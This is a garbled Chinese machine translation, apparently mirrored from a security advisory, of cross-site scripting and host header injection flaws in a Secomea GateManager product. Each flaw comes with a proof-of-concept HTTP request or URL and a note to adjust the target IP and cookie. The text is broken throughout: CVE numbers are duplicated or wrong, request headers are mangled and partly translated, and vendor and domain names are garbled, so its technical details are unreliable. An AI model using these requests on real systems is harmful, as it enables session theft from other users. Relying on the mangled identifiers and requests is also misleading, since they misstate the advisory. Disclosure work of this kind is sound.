可租户发现塞科马门管理器多漏洞塞科梅亚建议我们“期望这些漏洞会波及塞科梅亚所有供销商。”依目前所知,清单中包括B&R工业自动化GmbH
CVE-2020-29021文件存储跨线程
CVSSv3基准分数3.8
sv3向量:AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
拥有行政权限的用户可上传文件到所有用户都可访问的/pub/目录文件扩展没有限制,也没有禁止HTML或javascript制作
拥有服务器操作符权限攻击者可以通过向定制页注入恶意javascript来利用这个问题,当浏览时,该定制页可窃取其他用户cookie并迫使用户在不知情的情况下采取行动。
概念证明
发送下文请求后, spub/test.html页面完成后, 浏览器中将执行javascript
POST /admin/cgi/QTWhxhnPv.c6Ff8ZS-KxZH0IkpDojTv0Cb4eHk36FlBfz0YF/gui.cgi HTTP/1.1 Host: 192.168.0.186 User-Agent: Mozilla/5.0 (X11!inuxx8664rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data!boundary=---------------------------40815894029540187303449136273 Content-Length: 1205 Origin: https://192.168.0.186 Connection: close Referer: https://192.168.0.186/admin Upgrade-Insecure-Requests: 1 -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="op" save_file -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="ftype" public -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="fname" test.tar -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="MAX_FILE_SIZE" 268435456 -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="subdir" -----------------------------40815894029540187303449136273 Content-Disposition: form-data!名称表示文件filename="test.tar" Content-Type: application/x-tar-----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="altname" test.html -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="comment" -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="save_public" Upload -----------------------------40815894029540187303449136273--
注意: 您需要修改目标IP地址和cookie值
![](//www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/br1.png)
CVE-2020-29021:通过创建局部术语存储跨线程
CVSSv3基准分数3.8
sv3向量:AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
更新文件使用条件时,没有输入验证,并有可能输入任意javascript代码,当任何人查看文档时会生成
拥有服务器运算符权限攻击者可能利用这个问题,将恶意javascript插入网页“用户术语”,当浏览时可窃取其他用户cookie并迫使用户在不知情的情况下采取行动
概念证明
发送下文请求后, spub/test.html页面完成后, 浏览器中将执行javascript
POST /admin/cgi/QTWhxhnPv.c6Ff8ZS-KxZH0IkpDojTv0Cb4eHk36FlBfz0YF/gui.cgi HTTP/1.1 Host: 192.168.0.186 User-Agent: Mozilla/5.0 (X11!inuxx8664Gecko20100101Firefox/78.0接受文本/htmlq=0.01验收编码:en-USen;q=0.5验收编码:gzip,deflate内容-Type:application/x-www-form-urlecharset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 114 Origin: https://192.168.0.186 Connection: close Referer: https://192.168.0.186/admin FORMDATA=op=save_terms&subix=&config=%3Cscript%3Ealert('stored+xss')%3C%2Fscript%3E&ver=1&lang=en&language=English
注意: 您需要修改目标IP地址和cookie值
![](//www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/br2.png)
CVE-2020-29021:Qui.cgi反射跨线程预览_Text
CVSSv3基准分数6.3
sv3向量:AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
view_Text参数在gui.cgi上反射回响应而不净化JavaScript任意代码有可能注入用户浏览器中执行并上载编译URL
概念证明
页面由下URL提供时 JavaScript执行,结果显示消息'反射xs'
https://192.168.0.186/lm/cgi/gui.cgi?op=preview_terms&text=%3Cscript%3Ealert(%27reflected+xss%27)%3C/script%3E
注意IP地址需要修改以匹配目标
![](//www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/br_reflected.png)
CVE-2020-2902:HTTP宿头注入
CVSSv3基准分数4.3
sv3向量:AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
目标易受HTTP主头注入,该注入由主头验证不当引起
漏洞可能被网络缓存中毒所利用需要攻击者毒化缓存代理程序,例如CDN可能导致受害人被迫接收恶意内容-包括编程主机头
请求/回复显示为向受害人提供服务的例子可以看到有数个链路由 enable.com组成如果受害人点击这些链接中的任何链接,他们将被指向离预定网站远至潜在恶意网站
![](//www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/br3.png)
概念证明
复制此题时, 发下请求到目标后会从响应DOM中看到数个连接dable.com域
Get/HTTP/1.1主机:可租性.com缓存接受编码gzipwin64AppleWebKit/537.36(KHTML像Gecko) Chrome/87.280.66Safari/537.36连接:Cache-Control:最大值=0
示例输出
![](//www.yyueer.com/sites/drupal.dmz.tenablesecurity.com/files/files/advisory/br4.png)